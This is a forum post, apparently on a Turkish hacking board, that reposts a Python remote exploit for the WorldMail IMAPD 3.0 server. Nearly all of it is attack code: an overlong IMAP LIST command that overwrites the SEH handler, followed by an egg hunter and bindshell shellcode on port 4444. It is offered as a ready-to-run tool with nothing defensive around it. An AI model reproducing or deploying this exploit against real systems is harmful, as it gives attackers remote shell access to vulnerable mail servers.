Worldmail Imapd - Seh Overflow - Remote Exploit

Nulledtrxz · 5 Ocak 2023

<div class="bbWrapper"><div class="bbCodeBlock bbCodeBlock--screenLimited bbCodeBlock--code"> <div class="bbCodeBlock-title"> Kod: </div> <div class="bbCodeBlock-content" dir="ltr"> <pre class="bbCodeCode" dir="ltr" data-xf-init="code-block" data-lang=""><code>#!/usr/bin/env python # -*- coding: latin-1 -*- # #################################################### # ____ _ __ # # ___ __ __/ / /__ ___ ______ ______(_) /___ __ # # / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // / # # /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, / # # /___/ nullsecurity team # # # # wm-imapd.py - WorldMail IMAPD remote exploit # # # # DATE # # 09/01/2012 # # # # DESCRIPTION # # WorldMail IMAPD - SEH overflow - remote exploit # # # # AUTHOR # # TheXero - http://www.nulledtr.net # # # ################################################################################ import sys import socket ## Exploit Title: WorldMail imapd 3.0 SEH overflow (egg hunter) ## Tested on: XP SP3 en-us ## Author: TheXero ## Website: www.thexero.co.uk ## http://www.nullsecurity.net ## Check for parameters if len(sys.argv) != 3: print "Usage: " + sys.argv[0] + " 127.0.0.1 143" quit() ## Assigns the parameters target = sys.argv[1] port = int(sys.argv[2]) ## Sets up the socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) ## Sets the variables char = "}" nseh = "\xeb\x06\x90\x90" seh = "\x4e\x3b\x01\x10" ## 10013B4E |. 59 POP ECX mailcmn.dll buffer = '\x90' * 8 shellcode = ("T00WT00W" ## Bindshell port 4444 "\xbd\xe8\x39\x05\xa5\xdb\xdb\xd9\x74\x24\xf4\x58\x29\xc9\xb1" "\x56\x31\x68\x13\x03\x68\x13\x83\xc0\xec\xdb\xf0\x59\x04\x92" "\xfb\xa1\xd4\xc5\x72\x44\xe5\xd7\xe1\x0c\x57\xe8\x62\x40\x5b" "\x83\x27\x71\xe8\xe1\xef\x76\x59\x4f\xd6\xb9\x5a\x61\xd6\x16" "\x98\xe3\xaa\x64\xcc\xc3\x93\xa6\x01\x05\xd3\xdb\xe9\x57\x8c" "\x90\x5b\x48\xb9\xe5\x67\x69\x6d\x62\xd7\x11\x08\xb5\xa3\xab" "\x13\xe6\x1b\xa7\x5c\x1e\x10\xef\x7c\x1f\xf5\xf3\x41\x56\x72" "\xc7\x32\x69\x52\x19\xba\x5b\x9a\xf6\x85\x53\x17\x06\xc1\x54" "\xc7\x7d\x39\xa7\x7a\x86\xfa\xd5\xa0\x03\x1f\x7d\x23\xb3\xfb" "\x7f\xe0\x22\x8f\x8c\x4d\x20\xd7\x90\x50\xe5\x63\xac\xd9\x08" "\xa4\x24\x99\x2e\x60\x6c\x7a\x4e\x31\xc8\x2d\x6f\x21\xb4\x92" "\xd5\x29\x57\xc7\x6c\x70\x30\x24\x43\x8b\xc0\x22\xd4\xf8\xf2" "\xed\x4e\x97\xbe\x66\x49\x60\xc0\x5d\x2d\xfe\x3f\x5d\x4e\xd6" "\xfb\x09\x1e\x40\x2d\x31\xf5\x90\xd2\xe4\x5a\xc1\x7c\x56\x1b" "\xb1\x3c\x06\xf3\xdb\xb2\x79\xe3\xe3\x18\x0c\x23\x2a\x78\x5d" "\xc4\x4f\x7e\x70\x48\xd9\x98\x18\x60\x8f\x33\xb4\x42\xf4\x8b" "\x23\xbc\xde\xa7\xfc\x2a\x56\xae\x3a\x54\x67\xe4\x69\xf9\xcf" "\x6f\xf9\x11\xd4\x8e\xfe\x3f\x7c\xd8\xc7\xa8\xf6\xb4\x8a\x49" "\x06\x9d\x7c\xe9\x95\x7a\x7c\x64\x86\xd4\x2b\x21\x78\x2d\xb9" "\xdf\x23\x87\xdf\x1d\xb5\xe0\x5b\xfa\x06\xee\x62\x8f\x33\xd4" "\x74\x49\xbb\x50\x20\x05\xea\x0e\x9e\xe3\x44\xe1\x48\xba\x3b" "\xab\x1c\x3b\x70\x6c\x5a\x44\x5d\x1a\x82\xf5\x08\x5b\xbd\x3a" "\xdd\x6b\xc6\x26\x7d\x93\x1d\xe3\x8d\xde\x3f\x42\x06\x87\xaa" "\xd6\x4b\x38\x01\x14\x72\xbb\xa3\xe5\x81\xa3\xc6\xe0\xce\x63" "\x3b\x99\x5f\x06\x3b\x0e\x5f\x03") ## Calculates the size of junk depending on the shellcode junk = "\x41" * (769 - len(shellcode)) ## Egg Hunter hunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05" "\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7") ## Assembles the buffer buffer = char + junk + shellcode + nseh + seh + hunter + char ## Connects s.connect((target,port)) data=s.recv(1024) s.send("a001 LIST " + buffer + "\r\n") s.close() # EOF</code></pre> </div> </div></div>

Worldmail Imapd - Seh Overflow - Remote Exploit

Nulledtrxz

Yasal Uyarı !